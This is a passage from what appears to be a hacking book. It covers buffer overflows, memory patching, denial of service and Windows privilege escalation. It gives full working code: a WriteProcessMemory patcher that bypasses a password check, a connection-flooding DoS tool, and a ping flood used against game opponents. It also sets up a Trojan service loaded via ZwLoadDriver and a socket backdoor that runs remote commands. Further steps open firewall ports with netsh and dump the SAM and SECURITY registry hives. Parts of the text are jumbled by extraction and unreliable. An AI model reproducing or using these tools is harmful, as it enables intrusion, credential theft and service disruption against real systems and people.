we should again study a little portion of the memory model of software. The overflow C:\access denied\code\Debug>overflow AAAAAAAAAAAAAAAAAAAA`^P@ This is an buffer overflow example. . . . . If string buffer will exceed 15 bytes. it will cause an overflow. which handles the stack and heap. 189 . If string buffer will exceed 15 bytes. Press any key to continue .Breakin-In with the Canary Check Before going through this discussion deeply. it will cause an overflow. C:\access denied\code\Debug>overflow AAAAAAAAAAAAAAAAAAAA`^Q@ This is an buffer overflow example. Then locate the placement of canary and find out the different ways to thwart the canary check mechanism. Press any key to continue . If the shellcode executes before canary check.
190 . Press any key to continue .This is an buffer overflow example. If string buffer will exceed 15 bytes. . . it will cause an overflow.
how to make the shellcode to run by heap overflow? For finding its answer we need to study the structure of heap and then check out all possibilities & techniques to exploit heap related overflows. Let’s check out the architecture of heap Heap structure (Rough overview) 191 .Dereferencing the Heap Alike stack the heap objects can also be exploited if a buffer overflow occurs in heap object instances. Then. But the problem is that the saved return address is not saved on heap instead on the stack.
Every process is assigned a unique random process id every time it is launched in memory for execution. lets discus some aspects of process memory management. The attacker does not need the privileges.data’. Now we have a rough picture of process memory i. The process id can be checked using ‘TASKLIST’ command in windows and ‘PS’ in Linux systems. By default every PE image is loaded at 0x00400000 and the first executable code lies at 0x00401000. the segments. etc sections. n) but every page 192 . Every process has several different sections in its own process space. Well friends. It is analogous to books example as different subject books have same page numbers (1. the list is always at a large even at minimum running programs situation also. 3.. There is not a single process running at a single instance of time. The sections vanish in the form of memory pages. Let’s discus the process management carried out by operating system in memory.text’. The Windows NT type executables are also called as PE type (Portable Executable). Even the Guest users can also launch this attack. it’s not magical but windows keep the track of each & every process in its own manner. The group of pages having the same attributes and characteristics are identified as the sections like ‘.. 4.Modifying the process memory This is one of the worse kinds of attack for security systems. ‘. every process has its own segment and every segment may have the same logical addressing but the every segment will be located at different physical addresses. 2.e.e. But how is it possible to launch several processes at the same time in the same addresses. Before proceeding. All these sections are loaded in single segment in memory. A program during its execution time is called a process. Thus it becomes clear that many processes may be launched at the same logical addresses but they will be physically located at a different physical address and will be identified by the physical addressing i. It’s really magical that the os flips the program code at the same addresses as we click on another process and again the earlier code is loaded at same memory addresses if we jump on the earlier process again.
But we can modify other pages effectively.contains different text on same page numbers. For this purpose we have to jump into that processes memory and then carry out the hacks. A single section may have a number of memory pages depending upon its size.dll to do so. But we will use the same technique in a different way to make any secure software vulnerable. The segments tracking is done by operating system using some special cpu registers named segment selectors which are mainly ‘SS’. Normally no process is allowed to access the other processes memory normally but we will use two functions provided by kernel32. ‘FS’ etc. This is the most fatal attack on the computer systems as any user can redirect the executional flow to whatever branch of the code. if processor architecture will have special selector registers for OS selection. by jumping at different processes the segment selectors select the appropriate segment in the execution environment. The kernel32. Even the ‘text’ section containing the executable code that normally has the ‘read only’ attributes. Now consider it. It means we can even use those functions from lowest privilege mode ring3 or guest mode to alter the processes memory directly. These functions are OpenProcess and WriteProcessMemory. The technique used here is actually used by software developers to masquerade the code dealing with the security system. Moreover. Every page has a special attribute. ‘DS’. Like the pages.dll is loaded each & every time a process is loaded into the memory. flawless software can also be 193 . If a user does not have appropriate privileges. which identifies its access privileges. then he cannot access that page in the memory. then it will be capable of executing several instances of operating systems simultaneously. Now back on different section pages of a process. When we click on another process. the operating system just loads the corresponding process’s memory segment. which are essentially required by system with kernel mode privileges cannot be accessed from any other ring other that ring0. even if it is neatly developed. CS’.
8 0040111C: 83 C4 08 194 .exe program.8 15 push 15h 55 E8 lea edx.eax 14 jne 00401108 D8 30 41 00 push 4130D8h BD 46 00 00 call 004057BB C4 04 add esp. the stack & heaps can be modified. Check it out in the code. consider the earlier secpass. Its time to do it practically. password:” 004010C3: 68 004010C8: E8 004010CD: 83 004010D0: 6A 004010D2: 8D 004010D5: 52 004010D6: B9 004010DB: E8 004010E0: 8D 004010E3: 50 004010E4: 8D 004010E7: 51 004010E8: E8 004010ED: 83 004010F0: 85 004010F2: 75 004010F4: 68 004010F9: E8 004010FE: 83 00401101: 6A 00401103: E8 00401108: 68 0040110D: 68 00401112: 68 00401117: E8 C0 30 41 00 push 4130C0h . “Enter the string address is pushed on the stack of next function. Remember that sooner or later. And last but most dangerous attack. By now you will be able to identify and remediate the security codes. 004010BE: 68 . add esp. let us frame an example.4 00 push 0 DE 45 00 00 call 004056E6 50 11 40 00 push 401150h E0 30 41 00 push 4130E0h . One more thing. cout function. Well we are going to change the test condition which checks for the original password & if matched then conditional jumps jne or je are followed according to the situation. to carry out worse kind of hacks.414D00h F0 02 00 00 call 004013D0 45 E8 lea eax. 70 4C 41 00 push 414C70h D3 13 00 00 call 004024A0 C4 08 add esp. the return address can be directly changed to the desired address successfully without a buffer overflow and thwarting the canary security check.[ebp-2Ch] push ecx 73 47 00 00 call 00405860 C4 08 add esp. Or any arbitrary shellcode can be used to replace the original code or static data can be changed.[ebp-18h] push edx 00 4D 41 00 mov ecx.[ebp-18h] push eax 4D D4 lea ecx.made vulnerable by introducing several buffer overflows wherever possible. the user entered data passing the filter checking code can be changed after the checking.8 C0 test eax. the “Login failed” 70 4C 41 00 push 414C70h 84 13 00 00 call 004024A0 . test condition always produces branches.
. infect(processID.. (void *)0x004010F0. int instruction) { HANDLE h. &instruction. } { The OpenProcess requires the essential access type to open processes.. either change the test to xor or change the jne to je so that it will not be followed if we will pass it a wrong password. To do it we need to change the respective hex numbers from x85 to x33 or x75 to x74 it will probably fix the situation. cout << "Status:...h> using namespace std.... NULL). return EXIT_SUCCESS. cout << "Enter the ProcessID: ". pid). address. } int main (int argc..Done" << endl.. 1. cin >> processID. 0x33)..To remediate it... char argv[]) unsigned int processID. true. We are going to write the code in infectsec. void *address. int infect (unsigned int pid. h = OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE.. return WriteProcessMemory(h.cpp as /* infectsec.cpp */ #include <iostream> #include <windows. So we have to alter the . which are as: #define OWNER_SECURITY_INFORMATION #define GROUP_SECURITY_INFORMATION #define DACL_SECURITY_INFORMATION #define SACL_SECURITY_INFORMATION #define PROCESS_TERMINATE #define PROCESS_CREATE_THREAD (0X00000001L) (0X00000002L) (0X00000004L) (0X00000008L) (0x0001) (0x0002) 195 ..text section and overwrite the code at 0x004010F0 or at 0x004010F2.
The things most commonly done are like changing the damage caused by a gun fire making it equivalent to the damage done by the tanks or rockets.h> using namespace std. 196 . int instr) { HANDLE hInstance. Now let’s make a program which will be capable of overwriting any other processes /* infection. Now check the number of tasks running with tasklist command and note the process ID of secpass. and press enter. int writeJmp(int pid. or fixing his lives to hundred percent etc. We broke it again by overwriting the machine code.exe and press enter… wow! The new command console pops up which will occur only if original password will be given. Friends this technique is used by hackers in network games.exe. A player sits on the gaming system and plays with his counterparts on remote systems.exe and enter the process ID of secpass.cpp */ #include <iostream> #include <windows. Now compile the above program and then execute the secpass.#define PROCESS_SET_SESSIONID #define PROCESS_VM_OPERATION #define PROCESS_VM_READ #define PROCESS_VM_WRITE #define PROCESS_DUP_HANDLE #define PROCESS_CREATE_PROCESS #define PROCESS_SET_QUOTA #define PROCESS_SET_INFORMATION #define PROCESS_ALL_ACCESS SYNCHRONIZE | \ (0x0004) (0x0008) (0x0010) (0x0020) (0x0040) (0x0080) (0x0100) (0x0200) (STANDARD_RIGHTS_REQUIRED | 0xFFF) #define PROCESS_QUERY_INFORMATION (0x0400) Instead of using PROCESS_VM_OPERATION|PROCESS_VM_WRITE we can also use PROCESS_ALL_ACCESS.exe process and check for its normal flawless working. Now execute the infsec. Now enter any wrong password in secpass. while his team mates hackers sits on other systems login to his system’s console and change the instructions of game code in memory so as to make him win. void *address.
pid ). } { Compile above program and execute it. cin >> addr. address. true. C:\access denied\code>tasklist Image Name PID Session Name Session# Mem Usage ========================= ====== ================ ======== ============ cmd.exe 328 Console 0 4. (void *)addr. return WriteProcessMemory(hInstance. 1.200 K secpass. use calculator for this purpose (the PID is already shown in decimal format in tasklist output). And then memory address as well as the instruction must be in decimal number format. instruction)) == -1) cout << "Failed to overwrite the instruction.exe 236 Console 0 2. return EXIT_SUCCESS. char* argv[]) unsigned int addr. cout << "Enter the memory address (in decimal): ". if ((writeJmp(processID. But you need the desired process’s processID (PID). NULL). cin >> processID. cin >> instruction.exe 2060 Console 0 628 K tasklist. instruction. cout << "Enter the instruction (in decimal) : ". } int main (int argc.120 K C:\access denied\code>infection Enter the processID: 2060 Enter the memory address (in decimal): 4198640 Enter the instruction (in decimal) : 51 The instruction is changed in executing process successfully 197 ." << endl. &instr. else cout << "The instruction is changed in executing process successfully" << endl. int processID. You can get PID from tasklist command.hInstance=OpenProcess(PROCESS_VM_OPERATION|PROCESS_VM_WRITE. cout << "Enter the processID: ".
8 004010D0: 6A 15 push 15h the string size to be taken in the memory buffer.414D00h the address of getline function. E. it will make the safe functions like getline (in GUI applications the GetWindowsTextA function from user32. Check out the bold line at address 0x004010D0.[ebp-18h] pointer to the string is formed. let’s make the secpass. This tool can be used to effectively make any software vulnerable during runtime. can vary from 1 to the block size and instead of a single instruction. address. 004010DB: E8 F0 02 00 00 call 004013D0 call for cin function. 004010D2: 8D 55 E8 lea edx. 004010D6: B9 00 4D 41 00 mov. Well friends.C:\access denied\code> In above excerpt. 1. it pushes the 0x15 on the stack (push always puts on the stack). it is 21. Now open the calculator and convert the hex 0x15 into decimal format. &instr. let’s do it. providing it the pointer to the new block of instructions.cpp especially the cin line as 198 . we have checked it earlier that if we’ll increase the index bound limit than the memory buffer size.exe prone to buffer overflow. 4198640 is decimal equivalent of memory address 0x004010F0 and 51 is decimal equivalent of 0x33 (XOR instruction).g. 004010D5: 52 push edx pointer to the string is pushed on the stack. . NULL). . First we need to identify the getline function in disassembled dump. . . . The above tool can be configured to change the whole block of the code at a time by changing the 4rth argument of WriteProcessMemory(hInstance.dll is used to get the text input from the users in text boxes also uses the bound limit) vulnerable in windows environment. isn’t it? Remember the source code in secpass.
Let’s increase this bound to cause overflow in secpass. Now. Second thing is the new string length. Now we can suppose that rest of the attack. Change it to decimal it is 4198609. the address of memory location. But. the address of instruction 0x004010D0. you can do yourself. we have the target instruction or you can say the array index bound. And the last thing is the processID as usually.exe.getline(buffPass. 0x004010D0 + 0x1 = 0x004010D1.cin. we have to change the 0x15 & not 6A in 6A 15. Well we can overwrite it with any number up to 0xFF (255 in decimal). 21). But the above address is of instruction 6A. where 15 lies will be. For this hack. 199 . Therefore. we again need three things.
This kind of system can be found in college hostels or small office or home networked environments. Any damage to someone’s intellectual property caused by running this exploit will be the responsibility of the attacker himself. Now suppose if all legitimate connections will be eliminated with the forged connections. For example the IIS 5. Every year. But suppose if we try to connect it another 10th connection then it will refuse the connection. the business around the world. The attack can be easily planned by analyzing the statistical data or by forcing the systems to fell in an undesired condition having no handling branch or exception handling. /* denser. char* argv[]) SOCKET s. The DOS attack may be the resultant of lacking in software or hardware efficiency.1 on windows XP supports only 9 simultaneous connections.h> #define RPORT 80 using namespace std. Let’s frame an example exploit for such attack Note: This exploit is for study purpose and is proof of concept exploit.The Denial of Service Attacks The worse kind of attacks is the DOS attack also known as Denial of Service attack. { 200 . This exploit is not safe to be used to attack other systems. This attack is the nightmare of all e-businesses. lose thousands of billions dollars due to this attack. As the name clears that the server will be force not to serve any more legitimate requests. int main (int argc. then the server will deny anymore requests from the legitimate users. This data is enough to launch the DOS attack against such a server.cpp */ #include <iostream> #include <winsock.
rem_addr. return EXIT_SUCCESS. &wsaData)) != NULL) perror("WSAStartup"). NULL. (struct sockaddr *)&rem_addr. cout << "usage: denser <ip addr>" << endl." << endl. exit(1). Let’s check out its output as 201 .S_un.sin_addr.lib in Object/library modules. } rem_addr. IPPROTO_TCP)) == -1) { perror("socket"). rem_addr.sin_family = AF_INET. Separate it from other entries with a blank space and then compile the denser. // To show the progress meter (a white box in ASCII). By ctrl + S and then “F7” and then from Project menu select ‘settings’ and in ‘Link’ tab add wsock32. sizeof(struct sockaddr))) == -1) { perror("connect"). a). first save and build the project. 1). i++) { if ((s = socket(PF_INET. } if((WSAStartup (MAKEWORD(1. SOCKADDR_IN rem_addr.S_addr = inet_addr(argv[1]). } { { ******Xtremers******" << endl. i <= 10000. memset(&(rem_addr. int a = 178. cout << "created by: if ( argc < 2) exit(1).sin_port = htons(RPORT). cout << "Progress: ". } cout << endl << "Thanx.cpp. SOCK_STREAM. 8). Note: To compile above exploit.sin_zero). for (int i=0. } printf ( "%c". } if ((connect(s.WSADATA wsaData.
But it sends us some error message in web browser.0:0 0.0:0 0.0.0.0. we are running the above exploit denser on local machine (remember to clear the web browser’s history first) and then try to open the websites loaded in your web server or just type the server name in address box to open the default homepage.0:0 0. We can check out the connections with netstat –a command as C:\Documents and Settings\vinnu>netstat -a Active Connections Proto TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP TCP Local Address NASA:ftp NASA:telnet NASA:smtp NASA:http NASA:epmap NASA:https NASA:microsoft-ds NASA:1025 NASA:1027 NASA:1028 NASA:1029 NASA:1031 NASA:1032 NASA:1033 NASA:1034 NASA:1035 Foreign Address 0.0.1 created by: ******Xtremers****** Progress: As we see.0.0.0.C:\Documents and Settings\vinnu\Develop\opensource>denser created by: ******Xtremers****** usage: denser <ip addr> C:\Documents and Settings\vinnu\Develop\opensource>denser 127.0.0:0 0.0.0.0:0 0.0.0:0 0.0.0.0.0.0.0:0 0.0.0:0 localhost:http localhost:http localhost:http localhost:http localhost:http localhost:http localhost:http localhost:http State LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING LISTENING TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT 202 .0.
The exploit can be run from several machines simultaneously to attack more efficient servers serving several thousand requests at same time in that situation the attack will be called as DDOS attack (Distributed Denial of Service attack).0.1 (we can also replace last octet of victims address to 255 means broadcast address of 127. We are not very skillful in any single game. Note: Place victim host’s address in place of 127. We can either use smurf attack or do the broadcast ping to victim network or send unlimited number of icmp packets (ping data packets are also called icmp packets).0. But whenever playing the network or online games.0. The denials of service vulnerabilities are not always the fault of bad programming.0. we ourselves are fond of games.0. Best thing about ping packets is that the icmp packets are default allowed to firewalled hosts & icmp packets are not logged in logging servers. but emerge from the limited resource to be allocated like CPU.TCP TCP TCP TCP TCP TCP TCP TCP TCP NASA:1036 NASA:1037 NASA:1038 NASA:1039 NASA:1040 NASA:1041 NASA:1042 NASA:1043 NASA:1044 localhost:http localhost:http localhost:http localhost:http localhost:http localhost:http localhost:http localhost:http localhost:http TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT TIME_WAIT … and so on. Best example. Best example is ping utility.0.0 network.1 Pinging 127.0. The online games are the best victims of such resource eating attacks. We can also ping from several other systems for more effect. memory or data channels. but remember most firewalls filter out the broadcast pings) C:\Documents and Settings\vinnu>ping -t -l 1024 127. But remember that the ping attacking host or network must be different than the one from which you’ll play the network game.1 with 1024 bytes of data: 203 . we try to send the huge amount of junk data packets to our counterpart player’s computer system to occupy the precious network channels of victim network.
1: bytes=1024 time<1ms TTL=128 Reply from 127. Lost = 0 (0% loss).1: Packets: Sent = 5.0.0. Approximate round trip times in milli-seconds: Minimum = 0ms.0. 204 .1: bytes=1024 time<1ms TTL=128 Reply from 127.1: bytes=1024 time<1ms TTL=128 Reply from 127.0. Maximum = 0ms.0.0.1: bytes=1024 time<1ms TTL=128 Reply from 127.0. the ping data packets route must be different from the route of your gaming portal and game server and the counterpart player should be playing from a different host. Received = 5. the attack will cause delay in games data packets transmission from counterpart player’s host to game server and we can easily defeat them.0.0.Reply from 127. But remember.0. Average = 0ms Control-C The effect of such an attack is that the target system network resources will be used up by unwanted packets and the precious bandwidth will get exhausted and thus.1: bytes=1024 time<1ms TTL=128 Ping statistics for 127. other than game server.0.0.
But in Windows NT operating systems like NT. we would leverage the execution mode from low privileges to ring0. Once in ring0. ring2. The device driver installer programs in NT Operating systems use a special function ZwLoadDriver exported from NTDLL. lets discus a little about the privileges and the different rings. We can check the process list with TASKLIST /V command all processes running in ring0 will be assigned the user name NT AUTHORITY\SYSTEM. All device drivers work in kernel mode or ring0 (kernel mode & ring0 or SYSTEM are same thing). Rings are the security zones in operating system. But we need to add the driver service in the registry before uplifting the 205 . Before the call to the above function. In windows 9x. All processes working in ring0 are assigned the user ID SYSTEM. The ring structure is analogous to onion. we can do anything unrestrictedly. Before proceeding further. while the innermost ring is ring0. 2003. there were several ways to leverage the privileges to ring0 directly from ring3. ring1 & ring0. The ZwLoadDriver takes the driver service registry key name as its only argument. The operating system kernel lies in ring0. the driver must be enlisted in windows registry services key.Leveraging Privileges to Ring0 In this attack.dll. X for any device & D stands for driver). The ring3 is the outermost ring of the operating system. XP & VISTA do not employ such methods for security reasons. In windows XP the user working in ring0 is called SYSTEM. But there is a legitimate way to leverage the privileges. The VXD layer is also called device driver layer (V stands for virtual. All processes running with very low privileges are in ring3. The method employs the same technique as a device driver is loaded. 2000. but windows employ 4 rings especially ring3. Any user having enough privileges to install any device driver can leverage the privileges to ring0. There may be any number of rings in an os. The windows kernel comprises of mainly two layers the DLL layer and VXD layer.
Then the program to be executed in ring0 should be copied into %systemroot%\system32 directory. Now edit the service key registry file by right clicking it and pressing edit. ‘Start’ entries in right pane. There are mainly two shortcut ways to add a service in registry. We can export any service key from registry and then alter its values in notepad and export it back into registry. Now in file menu click ‘Export’ and it will ask you to save the service key. Now open HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services And now select any service name from left pane which contains ‘DisplayName’. Check out the list of files below that is necessary for leveraging the privileges: 1) Registry file to add Trojan service name in registry 2) Trojan horse to be executed in ring0 3) A vehicle program employing execve to execute Trojan 4) A launchpad program employing zwLoadDriver to uplift privileges The Trojan horse is a program which looks and works as a normal useful software but can be used for accomplishing the desired work by the attacker e. We need a launcher program for our target service to run in ring0. crashing the systems or leaking the data out etc. Now edit the entry [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tlntsrv] to [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\trojan_service_na me] and 206 . One example is aec or if you have telnet service on then find tlntsrv and double click it.g. spying.privileges. ‘ImagePath’. Now let us start the attack. open the registry editor by typing regedit in run or in command console. One use “REG ADD …” command or just save any service data in a file then alter it and import it into registry again. And the Trojan should be copied into system32 directory.
The file should look like and write trojan_service_name to whatever. Delete the Enum entry and its sub contents. and service name for now and save the file and double click it.exe and it starts cmd."Start"=dword:00000003 to "Start"=dword:00000002 as dword value 2 means auto start. Also change the ‘DisplayName’ to whatever you want. The whole thing should look like 207 . Just emphasize on ‘Start’.exe which already lies in system32 directory. when prompted click ‘yes’ and then ‘Ok’. Now open the service key HKLM\System\CurrentControlSet\Services\xtremers And change the ImagePath to the launchpad file for example we are going to specify the path of secjmp. And we have our Trojan service enlisted in registry. we named it xtremers.
cpp */ #include <iostream> #include <windows. 0x0000E86F call eax } Here we are pushing the offset of string containing the service key name of our Trojan service. __asm { push offset key add eax.Well friends. /* xtremersdrv. } { In above program we have implemented the code in assembly instructions under __asm {} block. 0x0000E86F call eax } // change the 0x0000E86F to according to your system. key: char keystr[] = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\xtremers".dll"). char* argv[]) HMODULE h. return EXIT_SUCCESS. now we need to code a leverager program. 0x0000E86F 208 . cout << "Created by ********** Xtremers **********" << endl. h = LoadLibrary("ntdll. And add eax. This is actually declared in label ‘key’. system("PAUSE").h> using namespace std. int main (int argc. __asm { push offset key add eax. This is done for the sake of simplicity & compactness of code.
In this instruction we are adding the address offset 0x0000E86F of ZwLoadDriver function in the image base of ntdll. Note: In your case.dll. the RVA offset may be different from that is listed here. You can get the exports of any Dll with the help of Dumpbin. It depends upon the OS version. 209 . compile and run the above program and check the effect in Task Manager by right clicking the taskbar and selecting ‘Task manager’ and selecting the ‘Processes’ tab. The third entry is the address offset of ZwLoadDriver.exe. You can get the offset of ZwLoadDriver from exports of ntdll. Just change this offset according to your OS version. Now after the add instruction. Now restart the computer and then. the eax register contains the address of ZwLoadDriver function and we are making a call to ZwLoadDriver with the instruction call eax.dll it is 996 3E3 0000E86F ZwLoadDriver You should keep in mind that LoadLibrary function returns the image base address of Dll in eax register.
Instead of cmd.But there is a problem. we cannot see the executing services or drivers. But the software we want to execute in ring0 can accomplish its tasks perfectly. We can use sockets for interaction with the program.exe. we can use other desired programs. 210 .
sin_family = AF_INET. struct sockaddr_in their_addr. int sin_size. newfd. char buf[2]. SOCK_STREAM. &wsaData) != 0) exit(1). my_addr. /* sockex1. we can create UDP as well sockfd = socket(PF_INET. 1). // now start the winsock library with WSAStartup function if (WSAStartup(MAKEWORD(1. int result = 0. // creating a TCP/IP socket. char bufferStr[100]. We are going to use the same functionality provided by sockets to interact with the leveraged Trojan horse (our program operating in ring0). if (INVALID_SOCKET == sockfd) exit(1). int main (int argc. which will work in ring0.h> #include <winsock. Let us code our Trojan horse program first. struct sockaddr_in my_addr. WSADATA wsaData. my_addr.Sockets for interaction with Service Sockets are the way the softwares interact with each other on local or remote computer systems.sin_port = htons(MYPORT).h> #define MYPORT 5555 using namespace std.cpp */ #include <iostream> #include <windows. We are following the same previous way for leveraging the privileges to ring0. char* argv[]) SOCKET sockfd. NULL). { 211 .
"Jet Propulsion Labs. &sin_size). 8). 1). else cout << "Bind successful" << endl. } bufferStr[i] = buf[0]. "\n\t\t\t\t\tEnter the command: ". we can also use memset(&(my_addr. result = listen(sockfd. 1. // instead of inet_addr("127. buf. 38.s_addr = inet_addr("127.sin_addr.0. while(recv(newfd.1"). if (result != 0) exit(1). (struct sockaddr *)&my_addr. "\n\t\t\t\t\t\tPress 'Q' to terminate the command string". result = bind(sockfd.my_addr. newfd = accept(sockfd.0. NULL). NULL)) if (buf[0] == 'Q') break. NASA.sin_zero). send(newfd. NULL). NULL. { bufferStr[i] = NULL. 48. 30.1"). sizeof(struct sockaddr)).0. California". // 1 stands for one connection if (result != 0) exit(1). send(newfd. int i = 0. NULL). { INADDR_ANY. if (INVALID_SOCKET == newfd) exit(1). sin_size = sizeof(struct sockaddr_in). 212 . cmdEngine: send(newfd. (struct sockaddr *)&their_addr.0.
NULL). system(bufferStr). "\n\t\t\t\t\t\tSafely exiting the server".log in d:\myservice folder (create the folder in d: drive before operation starts). California" and will send other notifications like to terminate the command string press ‘Q’. if ((buf[0] == 'y') || (buf[0] == 'Y')) goto cmdEngine. send(newfd. NASA.g. else NULL). // cout << "The assembled string is: " << bufferStr << endl.lib in ‘Object/library modules:’ text box and then compile the program. The above program opens a socket with port 5555 and listens for the incoming connection. buf. The above program once in ring0 will have a vast number of powers. you must take a look at Socket Programming section in Remote Exploit section. send(newfd. instead it redirects the output of the commands to a file outresult. NULL).exe directly. 213 . 50. But the program doesn’t show up the output. If connected. actually we cannot imagine about its powers. closesocket(newfd). recv(newfd. it will send the greeting “Jet Propulsion Labs. 38.exe in memory from system32 directory. ">>d:\\myservice\\outresult.i++. we can do whatever we want to do and e. Remember that the executer program is listed in registry key and not the sockex1. For a vivid look at socket programming. "\nDo you want to continue: [y/n]". 44. after saving the above program ‘Build’ the program and then in project ‘settings’ in ‘Project’ menu select the ‘Link’ tab and add the entry wsock32. } strcat(bufferStr. Let us code its executer program that will be responsible for launching the sockex1. we can launch other programs in systems with ring0 privileges (system or NT Authority user) and can perform unrestricted computing. return EXIT_SUCCESS. } Note: Because this program utilizes the socket programming therefore.log").
The registry file can be prepared by exporting any other service key in a backup file and then altering the backup file by just changing the service name. We have encoded the satellite i. Then execute the altered backup file to add the altered service to registry and then altering the ImagePath binary value to the path. The code of pslv. argsArray[0] = "sockex1".The whole setup is analogous to a satellite and rocket assembly. sockex1.exe program. argsArray[1] = NULL. return EXIT_SUCCESS.00 214 .cpp is /* pslv.exe and now we are going to code the rocket.e.h> using namespace std.exe".cpp */ #include <iostream> #include <process. program = "c:\\windows\\system32\\sockex1. int main (int argc. We can either use the reg add command or use a registry file. execve(program. NULL). the launching program i. which points to the pslv.cpp (PSLV stands for Polar Satellite Launch Vehicle is a rocket developed by Indian Space Research Organization for carrying the satellites to their respective polar orbits in space). pslv.e. argsArray. Well friends we have already formed a registry file for the earlier example. it acts like a satellite control system in real world. char* argv[]) char *program. *argsArray[2]. The registry file after all corrections is back upped again and is shown below Windows Registry Editor Version 5. } { Now we need a registry file.
00.00.00.00.00.00.00.65.74.00.00.00.00.5c.00.43.75.4c.53. "DependOnGroup"=hex(7):00.6e.00.6e.54.00.\ 65.53.00.75.64.00.67.65.72.61.00.20.00.65.00.65.50.exe injects the 215 .00.64.61. The launchpad.62.00.00.00 "DisplayName"="sysTrojan" "Description"=hex(2):4b.00.43. The launch pad is the program that actually works similar to the real world satellites launchpad.44.65.00.00.00.00.00.00 "DependOnService"=hex(7):52.00. But above file is a backup of our own Trojan service.\ 64.4e.00.00.00.00.00.63.5c.00.00.72.00.00.00.3a. The value 2 in double word start "Start"=dword:00000002 Means the service will start automatically after booting of Operating System.00.00.00. then it means the service can be started manually and value 4 means it is disabled.00.00.00.53.0 0.00.\ 00.5c.65.2e.exe to leverage the sysTrojan service in ring0.00. 78.53.00.00.00.43.75.64.00. After adding the registry service keys its time to prepare the launchpad.00.00.00.6d.00.45.4d.[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\sysTrojan] "Type"=dword:00000010 "Start"=dword:00000002 "ErrorControl"=dword:00000001 "ImagePath"=hex(2):43.70.00.73.00.0 0.\ 00 49.00.00.00.00.6f.00.5c.54.63.63.00.00. 00.65.00.00.20.\ 6c. 73.00.78.00.00 "ObjectName"="LocalSystem" We have named our new Trojan service sysTrojan.4d.72.65.00.65.00.00.76.00.00.00.00.64. Initially you need to alter only the two entries shown in bold and save the file and then alter the ImagePath field in registry.00.00.00.20.00.00.65.00.73.\ 00.6d.6d.20.6f.65. In our example we are using the launchpad.00.63.70.00.00.00.50.6e.00.00.00.50. If it will be 3.5c.6f .64.69.00.00.50.
dll").file enlisted in sysTrojan service (pslv.h> using namespace std. success: cout << endl. cout << "The Trojan successfully leveraged to ring0.cpp */ #include <iostream> #include <windows. hmod = LoadLibrary("ntdll. 0x0000E86F call eax } __asm { test eax. The code for launchpad. exit(1). int main (int argc.cpp is as /* launchpad." << endl. After next reboot the Task manager will show up the sockex1. __asm { push offset keyName add eax.".exe with System user associated with it as 216 . keyName: char keyPath[] = "HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Services\\sysTrojan". return EXIT_SUCCESS.exe and reboot the system. } { Execute the launchpad.exe) in kernel mode (in ring0). char* argv[]) HMODULE hmod. 0 je success } failed: cout << "Failed to leverage Trojan to ring0.
exe is prepared to hold only one connection. but the service will get restarted in back end. After the connection is terminated. Simultaneously and keep the service running even if all the connections are terminated.cpp so as to make it nonblocking and hold more connections. while attempting to connect to sysTrojan at 217 .But the sockex1. We can alter the code of sockex1. One more thing. It can be restarted by the command: Net start sysTrojan It will show that the service is not responding. the Trojan service will deny all connections until it is restarted again. The error message is shown because the sysTrojan is not listed in started services cache.
exe sysTrojan ENABLE We can also add above commands in pslv. Now is the time to check out the command execution in ring0 and test ride the privileges. Tell us how do you feel after running your commands in kernel mode? 218 . the firewall may prevent the connection and foil the attack.cpp in system function or as arguments of execve or execl functions.port 5555 from a remote system. We can open the port 5555 in windows XP internal firewall with the following command: netsh firewall set portopening ALL 5555 sysTrojan ENABLE ALL netsh firewall add portopening ALL 5555 sysTrojan ENABLE ALL Or instead we can add the program to be authorized to open any port and thus any connection by the following command: netsh firewall add allowedprogram c:\windows\system32\sockex1.
For security reasons even administrators are also restricted to open these two sub keys only modules executing in ring0 can open these keys. In windows registry there are few sub keys in which even administrators cannot get the access. Open a command console or write the following in run text box Telnet <computername or IP address> 5555 as in figure And click OK.Test Ride ring0 Let us take an example of registry. if you don’t know what it will result in. Do not try to change any value. As all commands executed with sysTrojan. Two of such keys are HKEY_LOCAL_MACHINE\SAM and HKEY_LOCAL_MACHINE\SECURITY. there will be no restriction at all. Every event is traced to the registry and even a single click of mouse concerns the registry. We are going to use the registry commands using our sysTrojan service. Friends we can open registry editor by writing regedit or regedt32 in run or at command console. it will connect to the sysTrojan service as 219 . run in NT Authority mode (ring0 or kernel mode). These two keys control and contain all the user related data and security policies. Note: Export the registry in a backup file before altering anything. Even Microsoft prompts you that to alter registry items on your own risk. then you can modify whole of operating system without using control panel. If you are a registry expert. The registry is the workhouse of Windows OS.
Now.txt For more help try the following command Reg export /? Check the stuff in action in following figure The ‘Q’ terminates the command as shown in message above the command. The above command will create a registry file 220 . actually we are going to backup the above listed two keys using reg export command. Let’s do it Reg export HKLM\SAM hacksam. we have to use a trick.
reg in system32 folder. Copy that file to any convenient place and right click on hacksam.reg and click edit. Now click on Edit menu and click Replace and type in HKEY_LOCAL_MACHINE in Find what text box and in Replace with text box write HKEY_LOCAL_MACHINE\SOFTWARE\HackSam as in figure 221 .hacksam. Otherwise open it in notepad.
And Save As the file with a new name hackedsam.reg file. It will show a dialogue for merging of the information contained in hackedsam.reg (keep the file name inside double quote to save it as .And click on Replace All. otherwise. click on ‘Yes’ as in figure and once again in following dialogue Now open the registry editor by writing regedit in Start->Run And check the following key HKEY_LOCAL_MACHINE\SOFTWARE\HackSam 222 . notepad will save it as a text file) & double click on this registry file.reg into registry.
As in next figure we have created a new sub key vHack in HKEY_LOCAL_MACHINE\SOFTWARE key which contains the HKEY_LOCAL_MACHINE\SECURITY sub key 223 . The SAM key contents In same way we can hack the HKEY_LOCAL_MACHINE\SECURITY key and create an alternative key in SOFTWARE.We can open the Sam sub key under HackSam sub key and can check all the values in SAM.
